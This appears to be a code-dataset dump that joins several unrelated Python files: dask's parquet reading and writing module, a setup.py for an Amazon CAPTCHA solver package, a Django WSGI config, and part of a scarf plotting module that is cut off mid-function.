srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 7
|
2015-01-04T18:50:00.000Z
|
2020-07-29T11:00:04.000Z
|
from distutils.version import LooseVersion
import tlz as toolz
import warnings
from ....bytes import core # noqa
from fsspec.core import get_fs_token_paths
from fsspec.utils import stringify_path
from ...core import DataFrame, new_dd_object
from ....base import tokenize
from ....utils import import_required, natural_sort_key, parse_bytes
from collections.abc import Mapping
from ...methods import concat
try:
import snappy
snappy.compress
except (ImportError, AttributeError):
snappy = None
__all__ = ("read_parquet", "to_parquet")
NONE_LABEL = "__null_dask_index__"
# ----------------------------------------------------------------------
# User API
class ParquetSubgraph(Mapping):
"""
Subgraph for reading Parquet files.
Enables optimizations (see optimize_read_parquet_getitem).
"""
def __init__(self, name, engine, fs, meta, columns, index, parts, kwargs):
self.name = name
self.engine = engine
self.fs = fs
self.meta = meta
self.columns = columns
self.index = index
self.parts = parts
self.kwargs = kwargs
def __repr__(self):
return "ParquetSubgraph<name='{}', n_parts={}, columns={}>".format(
self.name, len(self.parts), list(self.columns)
)
def __getitem__(self, key):
try:
name, i = key
except ValueError:
# too many / few values to unpack
raise KeyError(key) from None
if name != self.name:
raise KeyError(key)
if i < 0 or i >= len(self.parts):
raise KeyError(key)
part = self.parts[i]
if not isinstance(part, list):
part = [part]
return (
read_parquet_part,
self.engine.read_partition,
self.fs,
self.meta,
[p["piece"] for p in part],
self.columns,
self.index,
toolz.merge(part[0]["kwargs"], self.kwargs or {}),
)
def __len__(self):
return len(self.parts)
def __iter__(self):
for i in range(len(self)):
yield (self.name, i)
def read_parquet(
path,
columns=None,
filters=None,
categories=None,
index=None,
storage_options=None,
engine="auto",
gather_statistics=None,
split_row_groups=None,
chunksize=None,
**kwargs
):
"""
Read a Parquet file into a Dask DataFrame
This reads a directory of Parquet data into a Dask.dataframe, one file per
partition. It selects the index among the sorted columns if any exist.
Parameters
----------
path : string or list
Source directory for data, or path(s) to individual parquet files.
Prefix with a protocol like ``s3://`` to read from alternative
filesystems. To read from multiple files you can pass a globstring or a
list of paths, with the caveat that they must all have the same
protocol.
columns : string, list or None (default)
Field name(s) to read in as columns in the output. By default all
non-index fields will be read (as determined by the pandas parquet
metadata, if present). Provide a single field name instead of a list to
read in the data as a Series.
filters : Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
implements partition-level (hive) filtering only, i.e., to prevent the
loading of some row-groups and/or files.
Predicates can be expressed in disjunctive normal form (DNF). This means
that the innermost tuple describes a single column predicate. These
inner predicates are combined with an AND conjunction into a larger
predicate. The outer-most list then combines all of the combined
filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predicates, one must use the
(preferred) List[List[Tuple]] notation.
index : string, list, False or None (default)
Field name(s) to use as the output frame index. By default will be
inferred from the pandas parquet file metadata (if present). Use False
to read all fields as columns.
categories : list, dict or None
For any fields listed here, if the parquet encoding is Dictionary,
the column will be created with dtype category. Use only if it is
guaranteed that the column is encoded as dictionary in all row-groups.
If a list, assumes up to 2**16-1 labels; if a dict, specify the number
of labels expected; if None, will load categories automatically for
data written by dask/fastparquet, not otherwise.
storage_options : dict
Key/value pairs to be passed on to the file-system backend, if any.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet reader library to use. If only one library is installed, it
will use that one; if both, it will use 'fastparquet'
gather_statistics : bool or None (default).
Gather the statistics for each dataset partition. By default,
this will only be done if the _metadata file is available. Otherwise,
statistics will only be gathered if True, because the footer of
every file will be parsed (which is very slow on some systems).
split_row_groups : bool or int
Default is True if a _metadata file is available or if
the dataset is composed of a single file (otherwise the default is False).
If True, then each output dataframe partition will correspond to a single
parquet-file row-group. If False, each partition will correspond to a
complete file. If a positive integer value is given, each dataframe
partition will correspond to that number of parquet row-groups (or fewer).
Only the "pyarrow" engine supports this argument.
chunksize : int, str
The target task partition size. If set, consecutive row-groups
from the same file will be aggregated into the same output
partition until the aggregate size reaches this value.
**kwargs: dict (of dicts)
Passthrough key-word arguments for read backend.
The top-level keys correspond to the appropriate operation type, and
the second level corresponds to the kwargs that will be passed on to
the underlying `pyarrow` or `fastparquet` function.
Supported top-level keys: 'dataset' (for opening a `pyarrow` dataset),
'file' (for opening a `fastparquet` `ParquetFile`), 'read' (for the
backend read function), 'arrow_to_pandas' (for controlling the arguments
passed to convert from a `pyarrow.Table.to_pandas()`)
Examples
--------
>>> df = dd.read_parquet('s3://bucket/my-parquet-data') # doctest: +SKIP
See Also
--------
to_parquet
"""
if isinstance(columns, str):
df = read_parquet(
path,
[columns],
filters,
categories,
index,
storage_options,
engine,
gather_statistics,
)
return df[columns]
if columns is not None:
columns = list(columns)
name = "read-parquet-" + tokenize(
path,
columns,
filters,
categories,
index,
storage_options,
engine,
gather_statistics,
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, paths = get_fs_token_paths(path, mode="rb", storage_options=storage_options)
paths = sorted(paths, key=natural_sort_key) # numeric rather than glob ordering
auto_index_allowed = False
if index is None:
# User is allowing auto-detected index
auto_index_allowed = True
if index and isinstance(index, str):
index = [index]
meta, statistics, parts, index = engine.read_metadata(
fs,
paths,
categories=categories,
index=index,
gather_statistics=gather_statistics,
filters=filters,
split_row_groups=split_row_groups,
**kwargs
)
# Parse dataset statistics from metadata (if available)
parts, divisions, index, index_in_columns = process_statistics(
parts, statistics, filters, index, chunksize
)
# Account for index and columns arguments.
# Modify `meta` dataframe accordingly
meta, index, columns = set_index_columns(
meta, index, columns, index_in_columns, auto_index_allowed
)
if meta.index.name == NONE_LABEL:
meta.index.name = None
subgraph = ParquetSubgraph(name, engine, fs, meta, columns, index, parts, kwargs)
# Set the index that was previously treated as a column
if index_in_columns:
meta = meta.set_index(index)
if meta.index.name == NONE_LABEL:
meta.index.name = None
if len(divisions) < 2:
# empty dataframe - just use meta
subgraph = {(name, 0): meta}
divisions = (None, None)
return new_dd_object(subgraph, name, meta, divisions)
def read_parquet_part(func, fs, meta, part, columns, index, kwargs):
""" Read a part of a parquet dataset
This function is used by `read_parquet`."""
if isinstance(part, list):
dfs = [func(fs, rg, columns.copy(), index, **kwargs) for rg in part]
df = concat(dfs, axis=0)
else:
df = func(fs, part, columns, index, **kwargs)
if meta.columns.name:
df.columns.name = meta.columns.name
columns = columns or []
index = index or []
df = df[[c for c in columns if c not in index]]
if index == [NONE_LABEL]:
df.index.name = None
return df
def to_parquet(
df,
path,
engine="auto",
compression="default",
write_index=True,
append=False,
ignore_divisions=False,
partition_on=None,
storage_options=None,
write_metadata_file=True,
compute=True,
compute_kwargs=None,
**kwargs
):
"""Store Dask.dataframe to Parquet files
Notes
-----
Each partition will be written to a separate file.
Parameters
----------
df : dask.dataframe.DataFrame
path : string or pathlib.Path
Destination directory for data. Prepend with protocol like ``s3://``
or ``hdfs://`` for remote data.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet library to use. If only one library is installed, it will use
that one; if both, it will use 'fastparquet'.
compression : string or dict, optional
Either a string like ``"snappy"`` or a dictionary mapping column names
to compressors like ``{"name": "gzip", "values": "snappy"}``. The
default is ``"default"``, which uses the default compression for
whichever engine is selected.
write_index : boolean, optional
Whether or not to write the index. Defaults to True.
append : bool, optional
If False (default), construct data-set from scratch. If True, add new
row-group(s) to an existing data-set. In the latter case, the data-set
must exist, and the schema must match the input data.
ignore_divisions : bool, optional
If False (default) raises error when previous divisions overlap with
the new appended divisions. Ignored if append=False.
partition_on : list, optional
Construct directory-based partitioning by splitting on these fields'
values. Each dask partition will result in one or more datafiles,
there will be no global groupby.
storage_options : dict, optional
Key/value pairs to be passed on to the file-system backend, if any.
write_metadata_file : bool, optional
Whether to write the special "_metadata" file.
compute : bool, optional
If True (default) then the result is computed immediately. If False
then a ``dask.delayed`` object is returned for future computation.
compute_kwargs : dict, optional
Options to be passed in to the compute method
**kwargs :
Extra options to be passed on to the specific backend.
Examples
--------
>>> df = dd.read_csv(...) # doctest: +SKIP
>>> dd.to_parquet(df, '/path/to/output/',...) # doctest: +SKIP
See Also
--------
read_parquet: Read parquet data to dask.dataframe
"""
from dask import delayed
if compression == "default":
if snappy is not None:
compression = "snappy"
else:
compression = None
partition_on = partition_on or []
if isinstance(partition_on, str):
partition_on = [partition_on]
if set(partition_on) - set(df.columns):
raise ValueError(
"Partitioning on non-existent column. "
"partition_on=%s ."
"columns=%s" % (str(partition_on), str(list(df.columns)))
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, _ = get_fs_token_paths(path, mode="wb", storage_options=storage_options)
# Trim any protocol information from the path before forwarding
path = fs._strip_protocol(path)
# Save divisions and corresponding index name. This is necessary,
# because we may be resetting the index to write the file
division_info = {"divisions": df.divisions, "name": df.index.name}
if division_info["name"] is None:
# As of 0.24.2, pandas will rename an index with name=None
# when df.reset_index() is called. The default name is "index",
# but dask will always change the name to the NONE_LABEL constant
if NONE_LABEL not in df.columns:
division_info["name"] = NONE_LABEL
elif write_index:
raise ValueError(
"Index must have a name if __null_dask_index__ is a column."
)
else:
warnings.warn(
"If read back by Dask, column named __null_dask_index__ "
"will be set to the index (and renamed to None)."
)
# If write_index==True (default), reset the index and record the
# name of the original index in `index_cols` (we will set the name
# to the NONE_LABEL constant if it is originally `None`).
# `fastparquet` will use `index_cols` to specify the index column(s)
# in the metadata. `pyarrow` will revert the `reset_index` call
# below if `index_cols` is populated (because pyarrow will want to handle
# index preservation itself). For both engines, the column index
# will be written to "pandas metadata" if write_index=True
index_cols = []
if write_index:
real_cols = set(df.columns)
none_index = list(df._meta.index.names) == [None]
df = df.reset_index()
if none_index:
df.columns = [c if c != "index" else NONE_LABEL for c in df.columns]
index_cols = [c for c in set(df.columns).difference(real_cols)]
else:
# Not writing index - might as well drop it
df = df.reset_index(drop=True)
_to_parquet_kwargs = {
"engine",
"compression",
"write_index",
"append",
"ignore_divisions",
"partition_on",
"storage_options",
"write_metadata_file",
"compute",
}
kwargs_pass = {k: v for k, v in kwargs.items() if k not in _to_parquet_kwargs}
# Engine-specific initialization steps to write the dataset.
# Possibly create parquet metadata, and load existing stuff if appending
meta, i_offset = engine.initialize_write(
df,
fs,
path,
append=append,
ignore_divisions=ignore_divisions,
partition_on=partition_on,
division_info=division_info,
index_cols=index_cols,
**kwargs_pass
)
# Use i_offset and df.npartitions to define file-name list
filenames = ["part.%i.parquet" % (i + i_offset) for i in range(df.npartitions)]
# write parts
dwrite = delayed(engine.write_partition)
parts = [
dwrite(
d,
path,
fs,
filename,
partition_on,
write_metadata_file,
fmd=meta,
compression=compression,
index_cols=index_cols,
**kwargs_pass
)
for d, filename in zip(df.to_delayed(), filenames)
]
# single task to complete
out = delayed(lambda x: None)(parts)
if write_metadata_file:
out = delayed(engine.write_metadata)(
parts, meta, fs, path, append=append, compression=compression
)
if compute:
if compute_kwargs is None:
compute_kwargs = dict()
out = out.compute(**compute_kwargs)
return out
_ENGINES = {}
def get_engine(engine):
"""Get the parquet engine backend implementation.
Parameters
----------
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet reader library to use. Defaults to fastparquet if both are
installed
Returns
-------
A dict containing a ``'read'`` and ``'write'`` function.
"""
if engine in _ENGINES:
return _ENGINES[engine]
if engine == "auto":
for eng in ["fastparquet", "pyarrow"]:
try:
return get_engine(eng)
except RuntimeError:
pass
else:
raise RuntimeError("Please install either fastparquet or pyarrow")
elif engine == "fastparquet":
import_required("fastparquet", "`fastparquet` not installed")
from .fastparquet import FastParquetEngine
_ENGINES["fastparquet"] = eng = FastParquetEngine
return eng
elif engine == "pyarrow" or engine == "arrow":
pa = import_required("pyarrow", "`pyarrow` not installed")
from .arrow import ArrowEngine
if LooseVersion(pa.__version__) < "0.13.1":
raise RuntimeError("PyArrow version >= 0.13.1 required")
_ENGINES["pyarrow"] = eng = ArrowEngine
return eng
else:
raise ValueError(
'Unsupported engine: "{0}".'.format(engine)
+ ' Valid choices include "pyarrow" and "fastparquet".'
)
#####################
# Utility Functions #
#####################
def sorted_columns(statistics):
""" Find sorted columns given row-group statistics
This finds all columns that are sorted, along with appropriate divisions
values for those columns
Returns
-------
out: List of {'name': str, 'divisions': List[str]} dictionaries
"""
if not statistics:
return []
out = []
for i, c in enumerate(statistics[0]["columns"]):
if not all(
"min" in s["columns"][i] and "max" in s["columns"][i] for s in statistics
):
continue
divisions = [c["min"]]
max = c["max"]
success = True
for stats in statistics[1:]:
c = stats["columns"][i]
if c["min"] is None:
success = False
break
if c["min"] >= max:
divisions.append(c["min"])
max = c["max"]
else:
success = False
break
if success:
divisions.append(max)
assert divisions == sorted(divisions)
out.append({"name": c["name"], "divisions": divisions})
return out
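# Illustration (not from the original source) of a minimal statistics layout accepted above:
# each entry has a "columns" list of per-column records with "name", "min" and "max", e.g.
#
#   stats = [{"columns": [{"name": "ts", "min": 0, "max": 9}]},
#            {"columns": [{"name": "ts", "min": 10, "max": 19}]}]
#   sorted_columns(stats)  # -> [{"name": "ts", "divisions": [0, 10, 19]}]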
def apply_filters(parts, statistics, filters):
""" Apply filters onto parts/statistics pairs
Parameters
----------
parts: list
Tokens corresponding to row groups to read in the future
statistics: List[dict]
List of statistics for each part, including min and max values
filters: Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
implements partition-level (hive) filtering only, i.e., to prevent the
loading of some row-groups and/or files.
Predicates can be expressed in disjunctive normal form (DNF). This means
that the innermost tuple describes a single column predicate. These
inner predicates are combined with an AND conjunction into a larger
predicate. The outer-most list then combines all of the combined
filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predicates, one must use the
(preferred) List[List[Tuple]] notation.
Returns
-------
parts, statistics: the same as the input, but possibly a subset
"""
def apply_conjunction(parts, statistics, conjunction):
for column, operator, value in conjunction:
out_parts = []
out_statistics = []
for part, stats in zip(parts, statistics):
if "filter" in stats and stats["filter"]:
continue # Filtered by engine
try:
c = toolz.groupby("name", stats["columns"])[column][0]
min = c["min"]
max = c["max"]
except KeyError:
out_parts.append(part)
out_statistics.append(stats)
else:
if (
operator == "=="
and min <= value <= max
or operator == "<"
and min < value
or operator == "<="
and min <= value
or operator == ">"
and max > value
or operator == ">="
and max >= value
or operator == "in"
and any(min <= item <= max for item in value)
):
out_parts.append(part)
out_statistics.append(stats)
parts, statistics = out_parts, out_statistics
return parts, statistics
conjunction, *disjunction = filters if isinstance(filters[0], list) else [filters]
out_parts, out_statistics = apply_conjunction(parts, statistics, conjunction)
for conjunction in disjunction:
for part, stats in zip(*apply_conjunction(parts, statistics, conjunction)):
if part not in out_parts:
out_parts.append(part)
out_statistics.append(stats)
return out_parts, out_statistics
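# Illustration (not from the original source) of the filter notation handled above: a plain
# list of tuples is an AND conjunction, while a list of lists expresses OR between conjunctions.
#
#   filters = [("year", "==", 2020), ("month", ">", 6)]          # year == 2020 AND month > 6
#   filters = [[("year", "==", 2020)], [("year", "==", 2021)]]   # year == 2020 OR year == 2021
#
# Only parts whose column statistics can satisfy the predicates are kept.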
def process_statistics(parts, statistics, filters, index, chunksize):
"""Process row-group column statistics in metadata
Used in read_parquet.
"""
index_in_columns = False
if statistics:
result = list(
zip(
*[
(part, stats)
for part, stats in zip(parts, statistics)
if stats["num-rows"] > 0
]
)
)
parts, statistics = result or [[], []]
if filters:
parts, statistics = apply_filters(parts, statistics, filters)
# Aggregate parts/statistics if we are splitting by row-group
if chunksize:
parts, statistics = aggregate_row_groups(parts, statistics, chunksize)
out = sorted_columns(statistics)
if index and isinstance(index, str):
index = [index]
if index and out:
# Only one valid column
out = [o for o in out if o["name"] in index]
if index is not False and len(out) == 1:
# Use only sorted column with statistics as the index
divisions = out[0]["divisions"]
if index is None:
index_in_columns = True
index = [out[0]["name"]]
elif index != [out[0]["name"]]:
raise ValueError("Specified index is invalid.\nindex: {}".format(index))
elif index is not False and len(out) > 1:
if any(o["name"] == NONE_LABEL for o in out):
# Use the sorted column matching NONE_LABEL as the index
[o] = [o for o in out if o["name"] == NONE_LABEL]
divisions = o["divisions"]
if index is None:
index = [o["name"]]
index_in_columns = True
elif index != [o["name"]]:
raise ValueError(
"Specified index is invalid.\nindex: {}".format(index)
)
else:
# Multiple sorted columns found, cannot autodetect the index
warnings.warn(
"Multiple sorted columns found %s, cannot\n "
"autodetect index. Will continue without an index.\n"
"To pick an index column, use the index= keyword; to \n"
"silence this warning use index=False."
"" % [o["name"] for o in out],
RuntimeWarning,
)
index = False
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
return parts, divisions, index, index_in_columns
def set_index_columns(meta, index, columns, index_in_columns, auto_index_allowed):
"""Handle index/column arguments, and modify `meta`
Used in read_parquet.
"""
ignore_index_column_intersection = False
if columns is None:
# User didn't specify columns, so ignore any intersection
# of auto-detected values with the index (if necessary)
ignore_index_column_intersection = True
columns = [c for c in meta.columns]
if not set(columns).issubset(set(meta.columns)):
raise ValueError(
"The following columns were not found in the dataset %s\n"
"The following columns were found %s"
% (set(columns) - set(meta.columns), meta.columns)
)
if index:
if isinstance(index, str):
index = [index]
if isinstance(columns, str):
columns = [columns]
if ignore_index_column_intersection:
columns = [col for col in columns if col not in index]
if set(index).intersection(columns):
if auto_index_allowed:
raise ValueError(
"Specified index and column arguments must not intersect"
" (set index=False or remove the detected index from columns).\n"
"index: {} | column: {}".format(index, columns)
)
else:
raise ValueError(
"Specified index and column arguments must not intersect.\n"
"index: {} | column: {}".format(index, columns)
)
# Leaving index as a column in `meta`, because the index
# will be reset below (in case the index was detected after
# meta was created)
if index_in_columns:
meta = meta[columns + index]
else:
meta = meta[columns]
else:
meta = meta[list(columns)]
return meta, index, columns
def aggregate_row_groups(parts, stats, chunksize):
if not stats[0].get("file_path_0", None):
return parts, stats
parts_agg = []
stats_agg = []
chunksize = parse_bytes(chunksize)
next_part, next_stat = [parts[0].copy()], stats[0].copy()
for i in range(1, len(parts)):
stat, part = stats[i], parts[i]
if (stat["file_path_0"] == next_stat["file_path_0"]) and (
(next_stat["total_byte_size"] + stat["total_byte_size"]) <= chunksize
):
# Update part list
next_part.append(part)
# Update Statistics
next_stat["total_byte_size"] += stat["total_byte_size"]
next_stat["num-rows"] += stat["num-rows"]
for col, col_add in zip(next_stat["columns"], stat["columns"]):
if col["name"] != col_add["name"]:
raise ValueError("Columns are different!!")
if "null_count" in col:
col["null_count"] += col_add["null_count"]
if "min" in col:
col["min"] = min(col["min"], col_add["min"])
if "max" in col:
col["max"] = max(col["max"], col_add["max"])
else:
parts_agg.append(next_part)
stats_agg.append(next_stat)
next_part, next_stat = [part.copy()], stat.copy()
parts_agg.append(next_part)
stats_agg.append(next_stat)
return parts_agg, stats_agg
DataFrame.to_parquet.__doc__ = to_parquet.__doc__
| 35.072464
| 88
| 0.594077
|
934bce7625279182c9b6822780a8445933b338b6
| 2,270
|
py
|
Python
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 43
|
2020-05-22T12:49:30.000Z
|
2020-10-13T07:52:42.000Z
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 22
|
2020-09-12T14:40:48.000Z
|
2020-10-14T04:22:53.000Z
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 7
|
2020-05-29T03:09:52.000Z
|
2020-10-13T08:24:21.000Z
|
# -*- coding: utf-8 -*-
import setuptools
import os
#--------------------------------------------------------------------------------------------------------------
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'amazoncaptcha', '__version__.py'), 'r', encoding='utf-8') as f:
file_data = [i.replace('\n', '').replace('\'', '').split(' = ') for i in f.readlines()]
about = {k: v for k, v in file_data}
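# Hedged sketch (not part of the real package): the parser above assumes one
# `key = 'value'` pair per line in __version__.py. The lines and values below are
# illustrative placeholders that show how the dict comprehension consumes them.
_example_version_lines = [
    "__title__ = 'amazoncaptcha'\n",
    "__version__ = '0.0.0'\n",  # placeholder value, not the real version
]
_example_about = {k: v for k, v in
                  [i.replace('\n', '').replace('\'', '').split(' = ') for i in _example_version_lines]}
# _example_about == {'__title__': 'amazoncaptcha', '__version__': '0.0.0'}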
def readme(logo_end_line=14):
"""Extracts the logo from README file before pushing to PyPi."""
with open('README.md', 'r', encoding='utf-8') as fh:
long_description = ''.join(fh.readlines()[logo_end_line:])
return long_description
classifiers = [
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Natural Language :: English",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Information Technology",
]
requires = [
"pillow >= 9.0.1,< 9.2.0",
"requests ~= 2.27.1"
]
#--------------------------------------------------------------------------------------------------------------
setuptools.setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
packages=['amazoncaptcha'],
py_modules=['devtools', 'exceptions', 'solver', 'utils'],
include_package_data=True,
package_data={'': ['*.json'], 'amazoncaptcha': ['training_data/*.*']},
classifiers=classifiers,
long_description=readme(),
long_description_content_type="text/markdown",
install_requires=requires,
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
project_urls={
'Documentation': 'https://amazoncaptcha.readthedocs.io/en/latest/',
'Source': about['__url__'],
},
)
#--------------------------------------------------------------------------------------------------------------
| 34.923077
| 112
| 0.528634
|
c539ce35d1e36dd53f85195b5598a2ef9826ebc1
| 403
|
py
|
Python
|
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
"""
WSGI config for edge_shipment project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'edge_shipment.settings')
application = get_wsgi_application()
| 23.705882
| 78
| 0.791563
|
7b9d97b685e3ae933a7b2400439b25b605904c36
| 34,382
|
py
|
Python
|
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | 1
|
2021-08-07T20:55:08.000Z
|
2021-08-07T20:55:08.000Z
|
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | null | null | null |
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Contains the code for plotting in Scarf.
"""
import matplotlib.pyplot as plt
import matplotlib as mpl
import seaborn as sns
import numpy as np
import pandas as pd
from typing import Tuple, Optional
from cmocean import cm
from .utils import logger
plt.rcParams["svg.fonttype"] = "none"
# These palettes were lifted from scanpy.plotting.palettes
custom_palettes = {
10: [
"#1f77b4",
"#ff7f0e",
"#279e68",
"#d62728",
"#aa40fc",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#b5bd61",
"#17becf",
],
20: [
"#1f77b4",
"#aec7e8",
"#ff7f0e",
"#ffbb78",
"#2ca02c",
"#98df8a",
"#d62728",
"#ff9896",
"#9467bd",
"#c5b0d5",
"#8c564b",
"#c49c94",
"#e377c2",
"#f7b6d2",
"#7f7f7f",
"#c7c7c7",
"#bcbd22",
"#dbdb8d",
"#17becf",
"#9edae5",
],
28: [
"#023fa5",
"#7d87b9",
"#bec1d4",
"#d6bcc0",
"#bb7784",
"#8e063b",
"#4a6fe3",
"#8595e1",
"#b5bbe3",
"#e6afb9",
"#e07b91",
"#d33f6a",
"#11c638",
"#8dd593",
"#c6dec7",
"#ead3c6",
"#f0b98d",
"#ef9708",
"#0fcfc0",
"#9cded6",
"#d5eae7",
"#f3e1eb",
"#f6c4e1",
"#f79cd4",
"#7f7f7f",
"#c7c7c7",
"#1CE6FF",
"#336600",
],
102: [
"#FFFF00",
"#1CE6FF",
"#FF34FF",
"#FF4A46",
"#008941",
"#006FA6",
"#A30059",
"#FFDBE5",
"#7A4900",
"#0000A6",
"#63FFAC",
"#B79762",
"#004D43",
"#8FB0FF",
"#997D87",
"#5A0007",
"#809693",
"#6A3A4C",
"#1B4400",
"#4FC601",
"#3B5DFF",
"#4A3B53",
"#FF2F80",
"#61615A",
"#BA0900",
"#6B7900",
"#00C2A0",
"#FFAA92",
"#FF90C9",
"#B903AA",
"#D16100",
"#DDEFFF",
"#000035",
"#7B4F4B",
"#A1C299",
"#300018",
"#0AA6D8",
"#013349",
"#00846F",
"#372101",
"#FFB500",
"#C2FFED",
"#A079BF",
"#CC0744",
"#C0B9B2",
"#C2FF99",
"#001E09",
"#00489C",
"#6F0062",
"#0CBD66",
"#EEC3FF",
"#456D75",
"#B77B68",
"#7A87A1",
"#788D66",
"#885578",
"#FAD09F",
"#FF8A9A",
"#D157A0",
"#BEC459",
"#456648",
"#0086ED",
"#886F4C",
"#34362D",
"#B4A8BD",
"#00A6AA",
"#452C2C",
"#636375",
"#A3C8C9",
"#FF913F",
"#938A81",
"#575329",
"#00FECF",
"#B05B6F",
"#8CD0FF",
"#3B9700",
"#04F757",
"#C8A1A1",
"#1E6E00",
"#7900D7",
"#A77500",
"#6367A9",
"#A05837",
"#6B002C",
"#772600",
"#D790FF",
"#9B9700",
"#549E79",
"#FFF69F",
"#201625",
"#72418F",
"#BC23FF",
"#99ADC0",
"#3A2465",
"#922329",
"#5B4534",
"#FDE8DC",
"#404E55",
"#0089A3",
"#CB7E98",
"#A4E804",
"#324E72",
],
}
def clean_axis(ax, ts=11, ga=0.4):
"""
Cleans a given matplotlib axis.
"""
ax.xaxis.set_tick_params(labelsize=ts)
ax.yaxis.set_tick_params(labelsize=ts)
for i in ["top", "bottom", "left", "right"]:
ax.spines[i].set_visible(False)
ax.grid(which="major", linestyle="--", alpha=ga)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
return True
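# A minimal usage sketch for clean_axis (the example function below is illustrative and
# not part of Scarf): it strips the spines, shrinks the tick labels, adds a dashed grid
# and makes the figure/axes backgrounds transparent.
def _example_clean_axis():
    fig, ax = plt.subplots()
    ax.plot([0, 1, 2], [1, 0, 1])
    clean_axis(ax, ts=9, ga=0.3)  # smaller tick labels, lighter grid
    return fig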
def plot_graph_qc(g):
# TODO: add docstring description. Is this for qc of a graph, or for plotting a qc plot of a graph?
_, axis = plt.subplots(1, 2, figsize=(12, 4))
ax = axis[0]
x = np.array((g != 0).sum(axis=0))[0]
y = pd.Series(x).value_counts().sort_index()
ax.bar(y.index, y.values, width=0.5)
xlim = np.percentile(x, 99.5) + 5
ax.set_xlim((0, xlim))
ax.set_xlabel("Node degree")
ax.set_ylabel("Frequency")
ax.text(
xlim,
y.values.max(),
f"plot is clipped (max degree: {y.index.max()})",
ha="right",
fontsize=9,
)
clean_axis(ax)
ax = axis[1]
ax.hist(g.data, bins=30)
ax.set_xlabel("Edge weight")
ax.set_ylabel("Frequency")
clean_axis(ax)
plt.tight_layout()
plt.show()
def plot_qc(
data: pd.DataFrame,
color: str = "steelblue",
cmap: str = "tab20",
fig_size: tuple = None,
label_size: float = 10.0,
title_size: float = 10,
sup_title: str = None,
sup_title_size: float = 12,
scatter_size: float = 1.0,
max_points: int = 10000,
show_on_single_row: bool = True,
show_fig: bool = True,
):
# TODO: add docstring description. Is this for qc of a plot, or for plotting a qc plot?
n_plots = data.shape[1] - 1
n_groups = data["groups"].nunique()
if n_groups > 5 and show_on_single_row is True:
        logger.info(
            "Too many groups in the plot. If the plot looks too wide, consider "
            "setting the `show_on_single_row` parameter to False."
        )
if show_on_single_row is True:
n_rows = 1
n_cols = n_plots
else:
n_rows = n_plots
n_cols = 1
if fig_size is None:
fig_width = min(15, n_groups + (2 * n_cols))
fig_height = 1 + 2.5 * n_rows
fig_size = (fig_width, fig_height)
fig = plt.figure(figsize=fig_size)
grouped = data.groupby("groups")
for i in range(n_plots):
if data.columns[i] == "groups":
continue
vals = {"g": [], "v": []}
for j in sorted(data["groups"].unique()):
val = grouped.get_group(j)[data.columns[i]].values
vals["g"].extend([j for _ in range(len(val))])
vals["v"].extend(list(val))
vals = pd.DataFrame(vals)
ax = fig.add_subplot(n_rows, n_cols, i + 1)
if n_groups == 1:
sns.violinplot(
y="v",
x="g",
data=vals,
linewidth=1,
orient="v",
alpha=0.6,
inner=None,
cut=0,
color=color,
)
else:
sns.violinplot(
y="v",
x="g",
data=vals,
linewidth=1,
orient="v",
alpha=0.6,
inner=None,
cut=0,
palette=cmap,
)
if len(vals) > max_points:
sns.stripplot(
x="g",
y="v",
data=vals.sample(n=max_points),
jitter=0.4,
ax=ax,
